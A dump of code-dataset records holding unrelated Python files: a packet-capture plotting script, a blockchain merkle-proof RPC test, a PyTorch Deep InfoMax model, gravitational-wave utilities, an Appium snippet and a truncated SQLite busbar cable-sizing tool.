float(packet.frame_info.time_relative) >= start_time4 and float(packet.frame_info.time_relative) <= (start_time4 + time_to_compute):\n #time = int(float(packet.frame_info.time_relative) - start_time4)\n #if time in data4:\n # data4[time] += 1\n #else:\n # data4[time] = 1\n #elif float(packet.frame_info.time_relative) > (start_time4 + time_to_compute):\n # break\n\n# Tracer des graphes\nfig, ax = plt.subplots()\nplt.rcParams.update({'font.size': 16}) # Mise à jour de la taille de police\nplt.rc('xtick', labelsize=14)\nplt.rc('ytick', labelsize=14)\nplt.title(\"Volume de données échangées en fonction du temps lors des différentes captures\")\nplt.xlabel('Temps [sec]')\nplt.ylabel('Nombre de paquets par seconde [#/sec]')\nplt.plot(list(data1.keys()), list(data1.values()), label='Messages + Fichiers', color='crimson')\nplt.plot(list(data3.keys()), list(data3.values()), label='Appel Audio', color='green')\nplt.plot(list(data2.keys()), list(data2.values()), label='Appel Vidéo', color='blue')\n#plt.plot(list(data4.keys()), list(data4.values()), label='Capture 4', color='darkviolet')\nplt.legend()\nplt.show()\n","repo_name":"Hughlindien/LINFO1341_P1_V2","sub_path":"src/application_graph.py","file_name":"application_graph.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"832113194","text":"from test_framework.test_framework import IoPTestFramework\nfrom test_framework.util import *\n\nclass MerkleBlockTest(IoPTestFramework):\n\n def __init__(self):\n super().__init__()\n self.setup_clean_chain = True\n self.num_nodes = 4\n\n def setup_network(self):\n self.nodes = []\n # Nodes 0/1 are \"wallet\" nodes\n self.nodes.append(start_node(0, self.options.tmpdir, [\"-debug\"]))\n self.nodes.append(start_node(1, self.options.tmpdir, [\"-debug\"]))\n # Nodes 2/3 are used for testing\n self.nodes.append(start_node(2, self.options.tmpdir, [\"-debug\"]))\n self.nodes.append(start_node(3, self.options.tmpdir, [\"-debug\", \"-txindex\"]))\n connect_nodes(self.nodes[0], 1)\n connect_nodes(self.nodes[0], 2)\n connect_nodes(self.nodes[0], 3)\n\n self.is_network_split = False\n self.sync_all()\n\n def run_test(self):\n print(\"Mining blocks...\")\n self.nodes[0].generate(105)\n self.sync_all()\n\n chain_height = self.nodes[1].getblockcount()\n assert_equal(chain_height, 105)\n assert_equal(self.nodes[1].getbalance(), 0)\n assert_equal(self.nodes[2].getbalance(), 0)\n\n node0utxos = self.nodes[0].listunspent(1)\n tx1 = self.nodes[0].createrawtransaction([node0utxos.pop()], {self.nodes[1].getnewaddress(): 49.99})\n txid1 = self.nodes[0].sendrawtransaction(self.nodes[0].signrawtransaction(tx1)[\"hex\"])\n tx2 = self.nodes[0].createrawtransaction([node0utxos.pop()], {self.nodes[1].getnewaddress(): 49.99})\n txid2 = self.nodes[0].sendrawtransaction(self.nodes[0].signrawtransaction(tx2)[\"hex\"])\n assert_raises(JSONRPCException, self.nodes[0].gettxoutproof, [txid1])\n\n self.nodes[0].generate(1)\n blockhash = self.nodes[0].getblockhash(chain_height + 1)\n self.sync_all()\n\n txlist = []\n blocktxn = self.nodes[0].getblock(blockhash, True)[\"tx\"]\n txlist.append(blocktxn[1])\n txlist.append(blocktxn[2])\n\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1])), [txid1])\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2])), txlist)\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2], blockhash)), txlist)\n\n txin_spent = self.nodes[1].listunspent(1).pop()\n tx3 = self.nodes[1].createrawtransaction([txin_spent], {self.nodes[0].getnewaddress(): 49.98})\n self.nodes[0].sendrawtransaction(self.nodes[1].signrawtransaction(tx3)[\"hex\"])\n self.nodes[0].generate(1)\n self.sync_all()\n\n txid_spent = txin_spent[\"txid\"]\n txid_unspent = txid1 if txin_spent[\"txid\"] != txid1 else txid2\n\n # We can't find the block from a fully-spent tx\n assert_raises(JSONRPCException, self.nodes[2].gettxoutproof, [txid_spent])\n # ...but we can if we specify the block\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid_spent], blockhash)), [txid_spent])\n # ...or if the first tx is not fully-spent\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid_unspent])), [txid_unspent])\n try:\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2])), txlist)\n except JSONRPCException:\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid2, txid1])), txlist)\n # ...or if we have a -txindex\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[3].gettxoutproof([txid_spent])), [txid_spent])\n\nif __name__ == '__main__':\n MerkleBlockTest().main()\n","repo_name":"Internet-of-People/iop-blockchain","sub_path":"qa/rpc-tests/merkle_blocks.py","file_name":"merkle_blocks.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"10345946490","text":"import torch\nimport torch.nn as nn\nimport pytorch_lightning as pl\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom prot_repr.models.components import get_encoder, FcNet\n\n\nclass Discriminator(nn.Module):\n def __init__(self, input_size, hidden_sizes, activation='ReLU', b_norm=False, dropout=0.0):\n super().__init__()\n self.network = nn.Sequential(\n FcNet(input_size, hidden_sizes=hidden_sizes,\n activation=activation, b_norm=b_norm, dropout=dropout),\n nn.Linear(in_features=hidden_sizes[-1], out_features=1))\n\n def forward(self, inputs):\n # expecting b * d\n return self.network(inputs).squeeze(dim=-1)\n\n\nclass DIM(nn.Module):\n \"\"\" Implements a three layer GRU cell including an embedding layer\n and an output linear layer back to the size of the vocabulary\"\"\"\n\n def __init__(self, encoder_params, local_mine_params, global_mine_params, mode='concat', max_t=10):\n super(DIM, self).__init__()\n assert mode in ['concat', 'product'], \"mode should be either concat or product\"\n self.max_t = max_t\n self.encoder = get_encoder(**encoder_params)\n self.g_dim, self.l_dim = self.encoder.output_dim, self.encoder.local_output_dim\n self.global_discr = Discriminator(input_size=(max_t*self.l_dim + self.g_dim), **global_mine_params)\n self.local_discr = Discriminator(input_size=self.g_dim+self.l_dim, **local_mine_params)\n\n def encode(self, x):\n globals_, locals_ = self.encoder(x, return_locals=True)\n return globals_\n\n def forward(self, x):\n g_dim, l_dim = self.g_dim, self.l_dim\n globals_, locals_ = self.encoder(x, return_locals=True)\n b_dim, t_dim, _ = locals_.shape\n # locals_: b , t , f_dim\n # globals_: b , f_dim\n\n # global_MI # sample and concat all local features together and then with the global repr\n idx_t = torch.randint(0, t_dim, size=(b_dim, self.max_t)).sort(dim=1)[0] + \\\n torch.arange(0, b_dim*t_dim, step=t_dim)[:, None]\n locals_sampled_t = locals_.reshape(-1, l_dim)[idx_t.view(-1)].reshape(b_dim, self.max_t * l_dim)\n\n globals_inputs = torch.cat((locals_sampled_t.repeat_interleave(b_dim, dim=0),\n globals_.repeat(b_dim, 1)), dim=-1).reshape(b_dim, b_dim, -1) # b , b\n globals_mi = self.global_discr(globals_inputs)\n\n # local MI\n locals_l = locals_.repeat_interleave(b_dim, dim=0)\n globals_l = globals_.repeat(b_dim, 1).unsqueeze(1).expand(b_dim*b_dim, t_dim, g_dim)\n locals_mi = self.local_discr(torch.cat((locals_l, globals_l), dim=-1)).transpose(0, 1) # t , b*b\n locals_mi = locals_mi.reshape(t_dim, b_dim, b_dim)\n\n return globals_, locals_, globals_mi, locals_mi\n\n\nclass DIMModel(pl.LightningModule):\n def __init__(self, encoder_params, local_mine_params, global_mine_params, mode, max_t,\n train_loader, valid_loader, alpha=0., beta=1.0, gamma=0.001, optimizer='Adam', lr=1e-3):\n super().__init__()\n # self.hparams =\n self.network = DIM(encoder_params, local_mine_params, global_mine_params, mode, max_t)\n self.optimizer = optimizer\n self.train_loader = train_loader\n self.valid_loader = valid_loader\n self.lr = lr\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n\n def configure_optimizers(self):\n opt = torch.optim.Adam(self.network.parameters(), lr=self.lr)\n scheduler = ReduceLROnPlateau(opt, patience=5, factor=0.5, min_lr=self.lr/1000)\n return [opt], [scheduler]\n\n @pl.data_loader\n def train_dataloader(self):\n return self.train_loader\n\n @pl.data_loader\n def val_dataloader(self):\n return self.valid_loader\n\n def train_val_step(self, batch, is_train=True):\n # REQUIRED\n n, t = batch.shape\n globals_, _, globals_mi, locals_mi = self.network(batch)\n t_eff = locals_mi.shape[0]\n prior_loss = (globals_ ** 2).sum()\n locals_logsoftmax = nn.LogSoftmax(dim=-1)(locals_mi)\n globals_logsoftmax = nn.LogSoftmax(dim=-1)(globals_mi)\n locals_loss = - locals_logsoftmax.diagonal(dim1=1, dim2=2).mean()\n globals_loss = - globals_logsoftmax.diagonal().mean()\n loss = self.alpha * globals_loss + self.beta * locals_loss + self.gamma * prior_loss\n acc_globals = (torch.argmax(globals_logsoftmax, dim=-1) == torch.arange(n)).float().mean()\n acc_locals = (torch.argmax(locals_logsoftmax, dim=-1) == torch.arange(n).repeat(t_eff, 1)).float().mean()\n tensorboard_logs = dict(prior_loss=prior_loss,\n local_acc=acc_locals, global_acc=acc_globals,\n local_loss=locals_loss, global_loss=globals_loss)\n mode = 'train_' if is_train else 'val_'\n tensorboard_logs[mode+'loss'] = loss\n return {'loss': loss, 'log': tensorboard_logs}\n\n def training_step(self, batch, batch_idx):\n return self.train_val_step(batch, True)\n\n def validation_step(self, batch, batch_idx):\n return self.train_val_step(batch, False)\n\n def validation_end(self, outputs):\n # OPTIONAL, necessary for ckpt\n avg_loss = torch.stack([x['loss'] for x in outputs]).mean()\n return {'val_loss': avg_loss}","repo_name":"prtos/prot_repr","sub_path":"prot_repr/models/dim.py","file_name":"dim.py","file_ext":"py","file_size_in_byte":5387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9808707688","text":"__author__ = 'Yoshinta Setyawati'\n\nfrom numpy import *\nimport h5py\nimport pickle\nimport glob\nimport os\nfrom scipy import interpolate\nfrom pyrex.decor import *\nimport statistics\nimport lal\nfrom scipy.interpolate import InterpolatedUnivariateSpline as spline\n\ndef read_HDF5(file_dir):\n \"\"\"\n Read an HDF5 file.\n Parameters\n ----------\n file_dir : The directory of the file.\n\n Returns\n ------\n f : The read file with keys.\n \"\"\"\n f=h5py.File(file_dir,'r')\n return f\n\ndef write_HDF5(outfname,data_dict):\n \"\"\"\n Write an HDF5 file.\n Parameters\n ----------\n outfname : The directory of the output file.\n data_dict : The data variables to be written.\n\n Returns\n ------\n The written file with keys in outfname.\n \"\"\"\n fh5 = h5py.File(outfname, 'w')\n for var in data_dict.keys():\n print(var)\n try:\n print(dtype(data_dict[var][0]),var)\n fh5.create_dataset(var, data = asarray(data_dict[var]))\n except:\n print(type(data_dict[var]),var)\n if type(data_dict[var])!=list:\n if type(data_dict[var])!=str:\n fh5.create_dataset(var, data = asarray(data_dict[var]))\n else:\n asciiList = [n.encode(\"ascii\", \"ignore\") for n in data_dict[var]]\n fh5.create_dataset(var, (len(asciiList),1),'S10', asciiList)\n elif type(data_dict[var][0])==list:\n fh5.create_dataset(var, data = asarray(data_dict[var]))\n else:\n asciiList = [n.encode(\"ascii\", \"ignore\") for n in data_dict[var]]\n fh5.create_dataset(var, (len(asciiList),1),'S10', asciiList)\n fh5.close()\n\ndef read_pkl(file_dir):\n \"\"\"\n Read a pickle file.\n Parameters\n ----------\n file_dir : The directory of the file.\n\n Returns\n ------\n f : The read file with keys.\n \"\"\"\n with open(file_dir, 'rb') as f:\n data = pickle.load(f)\n return data\n\ndef write_pkl(outfname,data_dict):\n \"\"\"\n Write a pickle file.\n Parameters\n ----------\n outfname : The directory of the output file.\n data_dict : The data variables to be written.\n\n Returns\n ------\n The written file with keys in outfname.\n \"\"\"\n\n f = open(outfname,\"wb\")\n pickle.dump(data_dict,f)\n f.close()\n\ndef masses_from_eta(eta,total_mass=50.,**unused):\n \"\"\"\n Computes mass1 and mass2 from eta and total mass.\n\n Parameters\n ----------\n eta : {float}\n Eta = (m1m2)/(m1+m2)**2 of a given system.\n total_m : {float}\n Total mass m1+m2 of the system in MSun.\n\n Returns\n ------\n mass1 and mass2 in MSun.\n \"\"\"\n m1m2_from_eta=eta*total_mass**2\n mass2_from_eta = -(-total_mass+sqrt((total_mass**2)-(4.*m1m2_from_eta)))/2\n mass1_from_eta = -(-total_mass-sqrt((total_mass**2)-(4.*m1m2_from_eta)))/2\n return mass1_from_eta,mass2_from_eta\n\ndef masses_from_q(q,total_mass=50.):\n \"\"\"\n Computes mass1 and mass2 from eta and total mass.\n\n Parameters\n ----------\n q : {float}\n q = m1/m2, where m1>m2.\n total_m : {float}\n Total mass m1+m2 of the system in MSun.\n\n Returns\n ------\n mass1 and mass2 in MSun.\n \"\"\"\n\n mass1 = q/(1+q)*total_mass\n mass2 = total_mass-mass1\n return mass1,mass2\n\ndef check_total_spin(spinx,spiny,spinz):\n \"\"\"\n Check if the spins are reasonable.\n The magnitude of the spin in each body should less than 1.\n sqrt(spin_ix**2+spin_iy**2+spin_iz**2)<1.\n If over than one, will be normalized.\n\n Parameters\n ----------\n spinx: {float}\n Dimensionless spin in x direction.\n spiny: {float}\n Dimensionless spin in y direction.\n spinz: {float}\n Dimensionless spin in z direction.\n\n Returns\n ------\n spinx: {float}\n Normalized dimensionless spin in x direction\n spiny: {float}\n Normalized dimensionless spin in y direction\n spinz: {float}\n Normalized dimensionless spin in z direction\n \"\"\"\n tspin=sqrt(spinx**2+spiny**2+spinz**2)\n if (tspin>1):\n spinx=spinx/(tspin+0.0001)\n spiny=spiny/(tspin+0.0001)\n spinz=spinz/(tspin+0.0001)\n return spinx,spiny,spinz\n\ndef filter_dicts(alldata,key,val,target):\n '''\n Obtain the value of target if the value of key is val in alldata.\n '''\n seen=set()\n return [d[target] for d in alldata if d[key]==val]\n\ndef checkIfDuplicates(listofElems):\n '''\n Check if the given list contains any duplicates.\n '''\n for elem in listofElems:\n if listofElems.count(elem)>1:\n return True\n return False\n\ndef checkIfFilesExist(message,dirfile=\"../data/\"):\n '''\n Check if pickle files exist.\n '''\n r=0\n os.chdir(dirfile)\n #print(message)\n for file in glob.glob(\"*.pkl\"):\n #print(file)\n r=r+1\n if r<1:\n error(\"No *pkl files found in \" + str(dirfile) + \" . Please run 'example/traindata.py' to produce the train data.\")\n if r>1:\n error(\"Found \" + str(r) + \"*pkl files in \" + dirfile + \" . Please remove other *pkl files than the training data.\")\n else:\n dfs=dirfile+str(file)\n return dfs\n\ndef interp1D(trainkey,trainval,testkey):\n '''\n Perform 1D interpolation.\n\n Parameters\n ----------\n trainkey: []\n Array of the x interpolation values.\n trainval: []\n Array of the y interpolation values.\n testkey: []\n The position of the new x for interpolation.\n\n Returns\n ------\n result: []\n The interpolated value in 1 dimension.\n\n '''\n newkey,newval=check_duplicate_training(trainkey,trainval)\n\n if testkey<min(trainkey) or testkey>max(trainkey):\n interp=interpolate.interp1d(newkey,newval, fill_value='extrapolate')\n result=interp(testkey)\n else:\n interp=interpolate.interp1d(trainkey,trainval)\n result=interp(testkey)\n return result\n\ndef check_duplicate_training(trainkey,trainval):\n '''\n Check if the training keys have duplicate numbers.\n If so, get its average values before performing interpolation.\n Parameters\n ----------\n trainkey: []\n Array of the x interpolation values.\n trainval: {float}\n Array of the y interpolation values.\n\n Returns\n ------\n newkey: []\n The new x interpolation values (no duplicates).\n newval: []\n The new y interpolation values, average of the old trainval with duplicate trainkey.\n\n '''\n d = {}\n newkey=[]\n newval=[]\n\n for a, b in zip(list(trainkey), list(trainval)):\n d.setdefault(a, []).append(b)\n\n for key in d:\n newkey.append(key)\n newval.append(statistics.median(d[key]))\n return newkey,newval\n\ndef find_Y22(iota,coa_phi):\n '''\n Compute Y_(2,2) of spherical harmonics waveform.\n Source: https://arxiv.org/abs/0709.0093.\n Parameters\n ----------\n iota: {float}\n Inclination angle (rad).\n phi : {float}\n Phase of coalescence (rad).\n\n Returns\n ------\n Y_(2,2) : Spherical harmonics of the l=2, m=2 mode.\n '''\n Y22=sqrt(5./(64*pi))*((1+cos(iota))**2)*exp(2*coa_phi*1j)\n return Y22\n\ndef find_Y2minus2(iota,coa_phi):\n '''\n Compute Y_(2,-2) of spherical harmonics waveform.\n Source: https://arxiv.org/abs/0709.0093.\n Parameters\n ----------\n iota: {float}\n Inclination angle (rad).\n phi : {float}\n Phase of coalescence (rad).\n\n Returns\n ------\n Y_(2,-2) : Spherical harmonics of the l=2, m=2 mode.\n '''\n Y2minus2=sqrt(5./(64*pi))*((1-cos(iota))**2)*exp(-2*coa_phi*1j)\n return Y2minus2\n\ndef NR_amp_scale(total_mass,distance):\n return total_mass*lal.MTSUN_SI*lal.C_SI/(1e6*distance*lal.PC_SI)\n\ndef sanity_modes(t22,amp22_model,phase22_model,h22_model,t2_2,amp2_2_model,phase2_2_model,h2_2_model):\n def interpolate_data(oldtime,newtime,amp,phase,h22):\n interp_amp=spline(oldtime,amp)\n interp_phase=spline(oldtime,phase)\n interp_h_real=spline(oldtime,real(h22))\n interp_h_imag=spline(oldtime,imag(h22))\n newamp=interp_amp(newtime)\n newphase=interp_phase(newtime)\n newh=interp_h_real(newtime)+interp_h_imag(newtime)*1j\n return newamp,newphase,newh\n\n if len(t22)!=len(t2_2):\n tbegin=max(t22[0],t2_2[0])\n tfinal=min(t22[::-1][0],t2_2[::-1][0])\n deltat=min(abs(t22[1]-t22[0]),abs(t2_2[1]-t2_2[0]))\n t_join=arange(tbegin,tfinal,deltat)\n amp22_model,phase22_model,h22_model=interpolate_data(t22,t_join,amp22_model,phase22_model,h22_model)\n #elif len(t_join)!=len(t2_2):\n amp2_2_model,phase2_2_model,h2_2_model=interpolate_data(t2_2,t_join,amp2_2_model,phase2_2_model,h2_2_model)\n else:\n t_join=t22\n return t_join,amp22_model,phase22_model,h22_model,t2_2,amp2_2_model,phase2_2_model,h2_2_model\n\ndef freqISCO(total_mass):\n \"\"\"\n Compute ISCO frequency.\n Parameters\n ----------\n total_mass: {float}\n Total mass in MSun.\n\n Returns\n ------\n ISCOfreq : {float}\n ISCO frequency of the system.\n \"\"\"\n ISCOfreq=lal.C_SI**3/(pi*6**(3/2)*lal.G_SI*lal.MSUN_SI*total_mass)\n return ISCOfreq\n\n__all__ = [\"read_HDF5\", \"write_HDF5\", \"read_pkl\",\n \"write_pkl\",\n \"masses_from_eta\", \"masses_from_q\",\n \"check_total_spin\", \"filter_dicts\",\n \"checkIfDuplicates\", \"checkIfFilesExist\",\n \"interp1D\", \"check_duplicate_training\",\n \"find_Y22\", \"find_Y2minus2\",\n \"NR_amp_scale\", \"sanity_modes\",\n \"freqISCO\"]\n","repo_name":"Yoshinta/pyrex","sub_path":"pyrex/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":10177,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"15901049281","text":"\n\nfrom appium.webdriver import Remote\n\n\n\nclass MobileKeys:\n ENTER = 66\n VOLUME_UP = 24\n VOLUME_DOWN = 25\n\n\nif __name__ == '__main__':\n\n caps = {\n \"platformName\": \"Android\",\n # automationName: 平台原生测试框架\n # \"automationName\": \"UiAutomator1\",\n # \"platformVersion\": \"5.1\",\n # \"app\": r\"‪D:\\data\\柠檬班环境\\app测试环境\\环境\\应用apk包\\Future-release-2018.apk\",\n \"deviceName\": \"Android Emulator\",\n \"appActivity\": \"com.xxzb.fenwoo.activity.addition.WelcomeActivity\",\n \"appPackage\": \"com.xxzb.fenwoo\",\n # \"noReset\": \"false\",\n }\n\n driver = Remote(desired_capabilities=caps, command_executor='http://127.0.0.1:4444/wd/hub')\n driver.implicitly_wait(10)\n\n # iframe,web页面的切换\n # driver.switch_to.frame()\n\n#手机的切换\n # 获取所有的上下文。(webview, native) 列表\n driver.contexts\n # webview_name, webview 的名字\n driver.switch_to.context('webview')\n # 进入到 网页。\n\n","repo_name":"change1q2/APP","sub_path":"other/0228_appium九宫格绘制/app九宫格/deom5_混合应用.py","file_name":"deom5_混合应用.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"422458415","text":"import sqlite3\nimport math\n\nfrom sqlite3 import Error\n\ndef create_connection(path):\n connection = None\n try:\n connection = sqlite3.connect(path)\n print(\"Connection to SQLite DB successful\")\n except Error as e:\n print(f\"The error '{e}' occurred\")\n return connection\n\nconnection = create_connection(\"sm_app.sqlite\")\n\ndef execute_query(connection, query):\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n connection.commit()\n print(\"Query executed successfully\")\n except Error as e:\n print(f\"The error '{e}' occurred\")\n\ncreate_users_table = \"\"\"\nCREATE TABLE IF NOT EXISTS cabos (\n id PRIMARY KEY,\n material,\n section,\n perfil,\n condutores,\n maxcurrent,\n tabela,\n peso,\n inercia,\n w\n);\n\"\"\"\nexecute_query(connection, create_users_table) \n\n\ndef execute_read_query(connection, query):\n cursor = connection.cursor()\n result = None\n try:\n cursor.execute(query)\n result = cursor.fetchall()\n return result\n except Error as e:\n print(f\"The error '{e}' occurred\")\n\n\n# Começa a partir daqui\n\nmenu_options = {\n 1: 'Exit',\n 2: 'Ver tabela',\n 3: 'Calculo Completo',\n 4: 'Adicionar cabo para calculo',\n 5: 'Análise de sensibilidade',\n}\n\ndef print_menu():\n for key in menu_options.keys():\n print (key, '--', menu_options[key] )\n\n# Fim do menu\n#Inicio das estruturas de dados\n\ndef fator_temp(iz, delta1, delta2):\n return iz * math.sqrt(delta1/delta2) \n\ndef fator_alt(iz, h):\n if h<1000:\n iz = iz * 1\n elif h>=1000 and h<2000:\n iz = iz * 1\n elif h>=2000 and h<3000:\n iz = iz * 0.99\n elif h>=3000 and h<4000:\n iz = iz * 0.96 \n else:\n iz = iz * 0.9\n return iz\n\nclass cabolist:\n def __init__(self, id, material, section, perfil, conductors, maxcurrent, tabela, peso, inercia, w, meu_cabo): \n self.id = id\n self.material = material\n self.section = section\n self.perfil = perfil\n self.conductors = conductors\n self.maxcurrent = maxcurrent\n self.tabela = tabela\n self.peso = peso\n self.inercia = inercia\n self.w = w\n self.F=0\n \n if (self.material == 0) | (self.material == 2):\n self.custo = peso*4.20 #(peso/km)*preçoCU\n self.alfa = 0.000017 \n if (self.material == 1) | (self.material == 3):\n self.custo = peso*2.75 #(peso/km)*preçoAL\n self.alfa = 0.000022 \n self.E = 1.2 * 1000000\n L = meu_cabo.l*10\n self.fo = 112 * math.sqrt(10*(self.E*0.01*self.inercia*10000)/(self.peso*0.001*L*L*L*L)) \ndb_cabo_list = []\n\nclass cabo:\n def __init__(self, U, Scc, S, Perf, Cond, Mat, a, t_cc, l, sigma, h, delta1): \n self.U = U\n self.Scc = Scc \n self.S = S\n self.Perf = Perf\n self.Cond = Cond\n self.Mat = Mat\n self.a = a\n self.t_cc = t_cc\n self.l = l\n self.sigma = sigma\n self.X = 1.8\n\n self.Is = self.S / ( 1.732 * self.U )\n delta2=35\n self.Is = fator_temp(self.Is, delta1, delta2)\n self.Is = fator_alt(self.Is, h)\n\n self.Icc = self.Scc / ( 1.732 * self.U )\n self.ich = self.X * 1.41421 * self.Icc * 0.93\n self.fe=2.04*0.01*(self.ich/1000)*(self.ich/1000)*(self.l*0.01)/(self.a*0.01)\n self.mf = (self.fe* self.l)/16\n self.Ith = 0\n self.m = 0\n self.n = 0\n self.varTem=0\n if (self.Mat == 0) or (self.Mat == 2):\n self.e=(1/56)*(1+ (0.004*45))*0.001 \n if (self.Mat == 1) or (self.Mat == 3): #Isso muda pra Aluminio IMPORTANTE\n self.e=(1/34.2)*(1+ (0.004*45))*0.001 #IMPORTANTE MUDAR DEPOIS\n self.U=8.9*0.000001\n self.C=4.1868*93\n self.kLinha = self.e/(self.U*self.C) \n \n \n#meu_cabo = cabo(15000,500000000,1250000,5,1,1,35,0.5,180,1200,0,35)\n#flag = 1 #IMPORTANTE MUDAR DEPOIS\n\ndef show_cable(cable):\n #Apresentação de resultado \n print(\"Cabo de menor secção que cumpre as especificações: \")\n print(\"id = \", cable.id)\n if cable.material == 0:\n print(\"Material = Cobre não pintado\")\n elif cable.material == 1:\n print(\"Material = Cobre pintado\")\n elif cable.material == 2:\n print(\"Material = Aluminio não pintado\")\n elif cable.material == 3:\n print(\"Material = Aluminio pintado\")\n\n print(\"Section = \", cable.section, \"mm^2\")\n\n if cable.perfil == 1:\n print(\"Perfil = Circular\")\n elif cable.perfil == 2:\n print(\"Perfil = Tubular\")\n elif cable.perfil == 3:\n print(\"Perfil = Retangular Horizontal\")\n elif cable.perfil == 4:\n print(\"Perfil = Retangular Vertical\")\n elif cable.perfil == 5:\n print(\"Perfil = U Vertical\")\n elif cable.perfil == 6:\n print(\"Perfil = U Horizontal\")\n print(\"Nº Conductors = \", cable.conductors)\n print(\"Max current in the cable = \", cable.maxcurrent, \"A\")\n print(\"Tabela onde esta = \", cable.tabela)\n print(\"Peso/km = \", cable.peso, \"kg/m\")\n print(\"Inercia = \", cable.inercia, \", cm^4\")\n print(\"Modulo de Flexao = \", cable.w, \"cm^3\")\n if cable.fo != 0:\n print(\"Freq de ressonancia: = \", cable.fo, \"Hz\")\n if cable.F != 0:\n print(\"F = \", cable.F, \"kgf\")\n print(\"Fk = \", cable.Fk, \"kgf\")\n print(\"Força exercida sobre os isoladores nas extremidades = \",cable.extremidade, \"kgf\")\n print(\"Força exercida sobre os isoladores intermedios = \",cable.intermedio, \"kgf\")\n if cable.custo != 0:\n print(\"O cabo custa \", round(cable.custo,2),\" euros/m\")\n # Fim da Apresentação de resultado\n\ndef caso():\n # Entrada de dados\n U = int(input('Qual o nivel de tensao: '))\n Scc = int(input('Qual a potencia de cc: '))\n S = int(input('Qual a potencia nominal: '))\n Perf = int(input('Qual o perfil: '))\n Cond = int(input('Quantos condutores: '))\n Mat = int(input('Qual o material (0 - Cu, 1 - Al, 2 - Cu pintado, 3 - Al pintado): '))\n t_cc = float(input('Qual o tempo do cc: '))\n a = float(input('Qual a distancia entre fases: '))\n l = float(input('Qual o comprimento do vao: '))\n sigma = int(input('Qual a carga de seguranca a flexão: '))\n h =int(input('Qual a altitude: ')) \n delta1 =int(input('Qual a temperatura: ')) \n \n # Fim da entrada de dados\n\n # Fase 2 - bersão base - Contas regime permanente\n \n temp = cabo(U, Scc, S, Perf, Cond, Mat, a, t_cc, l, sigma, h, delta1) \n global meu_cabo \n global flag\n meu_cabo = temp\n flag = 1\n\ndef sensibilidade():\n global meu_cabo\n print('Análise de sensibilidade')\n varU = float(input('Variação do nível de tensão (%): '))\n varScc = float(input('Variação da potência de cc (%): '))\n varS = float(input('Variação da potência nominal (%): '))\n varA = float(input('Variação da distância entre fases (%): '))\n U = meu_cabo.U * (1 + varU / 100)\n Scc = meu_cabo.Scc * (1 + varScc / 100)\n S = meu_cabo.S * (1 + varS / 100)\n a = meu_cabo.a * (1 + varA / 100)\n meu_cabo_old = meu_cabo\n meu_cabo = cabo(U, Scc, S, meu_cabo.Perf, meu_cabo.Cond, meu_cabo.Mat, a, meu_cabo.t_cc, meu_cabo.l, meu_cabo.sigma)\n intro()\n permanente()\n cc()\n flexao()\n ressonancia()\n custo()\n esfTer()\n meu_cabo = meu_cabo_old\n\ndef custo(meu_cabo,db_cabo_list):\n global chepest \n chepest = min (db_cabo_list, key=lambda cabolist: cabolist.custo)\n print(\"\\n\\nCUSTO:\")\n show_cable(chepest)\n\ndef ressonancia(meu_cabo,db_cabo_list):\n for elem in db_cabo_list:\n if (elem.fo>45 and elem.fo<55) or (elem.fo>90 and elem.fo<110):\n db_cabo_list.remove(elem)\n\n #the one with less section\n smallest = min (db_cabo_list, key=lambda cabolist: cabolist.section)\n\n #Apresentação de resultado\n print(\"\\n\\nRESSONANCIA:\") \n show_cable(smallest)\n\ndef flexao(meu_cabo,db_cabo_list):\n for elem in db_cabo_list:\n if (elem.w < ((meu_cabo.mf)/meu_cabo.sigma)):\n db_cabo_list.remove(elem)\n \n smallest = min (db_cabo_list, key=lambda cabolist: cabolist.section)\n\n #Apresentação de resultado\n print(\"\\n\\nFLEXAO:\") \n show_cable(smallest)\n\n\ndef lerDB():\n select_cabos = \"SELECT * from cabos\"\n cabos = execute_read_query(connection, select_cabos)\n print(\"\\n\\n\")\n for cabos in cabos:\n print(cabos)\n print(\"\\n\\n\")\n\ndef intro(meu_cabo,db_cabo_list):\n \n\n # search cables in database\n select_cabos = \"SELECT * FROM cabos WHERE perfil = '\"+ str(meu_cabo.Perf) +\".0' AND material = '\"+ str(meu_cabo.Mat) +\".0'\"\n cabos = execute_read_query(connection, select_cabos)\n i=0\n cabo_select = []\n for cabos in cabos:\n cabo_select.append(str(cabos))\n i=i+1\n for i in range(len(cabo_select)):\n word = cabo_select[i].split()\n for y in range(len(word)):\n word[y]=word[y].replace(\"(\",\"\")\n word[y]=word[y].replace(\",\",\"\")\n word[y]=word[y].replace(\")\",\"\")\n word[y]=word[y].replace(\"'\",\"\")\n id=int(float(word[0]))\n material= int(float(word[1]))\n section = int(float(word[2]))\n perfil = int(float(word[3]))\n conductor = int(float(word[4]))\n maxcurrent = int(float(word[5]))\n tabela = int(float(word[6]))\n peso = float(word[7])\n inercia = float(word[8])\n w = float(word[9])\n temp = cabolist(id, material, section, perfil, conductor, maxcurrent, tabela, peso, inercia, w, meu_cabo)\n if material == meu_cabo.Mat and perfil == meu_cabo.Perf:\n db_cabo_list.append(temp)\n\ndef permanente(meu_cabo,db_cabo_list):\n for elem in db_cabo_list:\n if elem.maxcurrent < meu_cabo.Is:\n db_cabo_list.remove(elem)\n\n # the 